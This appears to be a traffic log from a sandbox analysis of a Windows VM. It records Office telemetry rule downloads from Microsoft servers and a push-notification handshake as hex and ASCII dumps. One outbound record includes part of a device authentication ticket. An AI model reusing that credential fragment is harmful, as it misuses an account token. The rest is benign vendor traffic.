2024-11-13 19:39:35 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=76028 Date: Wed, 13 Nov 2024 19:39:34 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-13 19:39:35 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.5	49814	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:35 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:35 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:35 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: dcb3d461-101e-000b-6d69-355e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193935Z-1749fc9bdbds4vwlhC1DFWz44000000001bg00000000gd8t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:35 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.5	49813	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:35 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 43 35 61 6a 48 2b 45 74 49 30 71 2f 45 7a 70 32 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 62 61 36 65 30 36 33 34 62 62 32 37 32 36 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: C5ajH+EtI0q/Ezp2.1Context: 79ba6e0634bb2726
2024-11-13 19:39:35 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-13 19:39:35 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 43 35 61 6a 48 2b 45 74 49 30 71 2f 45 7a 70 32 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 62 61 36 65 30 36 33 34 62 62 32 37 32 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 44 41 46 67 32 4e 6c 74 7a 37 71 76 6d 39 30 2b 79 79 77 72 36 4d 4c 35 48 6a 54 67 34 50 70 45 64 39 52 56 37 45 75 39 66 50 61 57 36 6b 6b 58 55 38 76 4c 59 75 59 33 68 4f 6b 56 34 63 4f 70 33 38 53 39 75 71 5a 43 54 67 49 65 2f 30 54 34 69 42 51 62 42 6b 4f 41 58 69 67 63 71 67 59 79 4c 75 76 39 4c 76 63 68 42 2b 78 2f Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: C5ajH+EtI0q/Ezp2.2Context: 79ba6e0634bb2726<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZDAFg2Nltz7qvm90+yywr6ML5HjTg4PpEd9RV7Eu9fPaW6kkXU8vLYuY3hOkV4cOp38S9uqZCTgIe/0T4iBQbBkOAXigcqgYyLuv9LvchB+x/
2024-11-13 19:39:35 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 43 35 61 6a 48 2b 45 74 49 30 71 2f 45 7a 70 32 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 62 61 36 65 30 36 33 34 62 62 32 37 32 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: C5ajH+EtI0q/Ezp2.3Context: 79ba6e0634bb2726<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-13 19:39:35 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-13 19:39:35 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 6c 4b 42 58 2b 43 37 5a 6c 45 69 39 53 4b 6f 72 6b 70 35 59 55 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: lKBX+C7ZlEi9SKorkp5YUQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.5	49816	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:35 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:35 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:35 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193935Z-16547b76f7fmbrhqhC1DFWkds80000000hng00000000df4a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:35 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.5	49815	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:35 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:35 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:35 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 162cf1ac-401e-002a-0c09-2dc62e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193935Z-16547b76f7fkj7j4hC1DFW0a9g0000000hhg00000000hat6 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:35 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.5	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:35 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:35 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:35 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: ed171e7d-901e-0015-69a2-34b284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193935Z-1749fc9bdbdb8fs8hC1DFW2b8g00000001p0000000003w7x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:35 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.5	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:35 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:35 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:35 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 5df09d77-001e-00a2-0c15-2dd4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193935Z-16547b76f7fdf69shC1DFWcpd00000000hfg00000000gc42 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:35 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.5	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:36 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:36 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:36 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 50fcf232-201e-0085-635e-3534e3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193936Z-r178fb8d7657w5c5hC1DFW5ngg00000001n0000000008b2z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:36 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.5	49822	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:36 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:36 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:36 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: e9278802-001e-002b-42a0-3499f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193936Z-1749fc9bdbdpg69chC1DFWhecg00000001cg000000006yss x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:36 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.5	49823	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:36 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:36 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:36 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 898dd9bc-901e-0048-53d2-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193936Z-16547b76f7f7lhvnhC1DFWa2k00000000hf000000000k02r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:36 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.5	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:36 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:36 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:36 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: f6e8dc5a-601e-0002-3da0-34a786000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193936Z-1749fc9bdbd4dqj6hC1DFWr4n400000001gg00000000b0qp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:36 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.5	49821	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:36 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
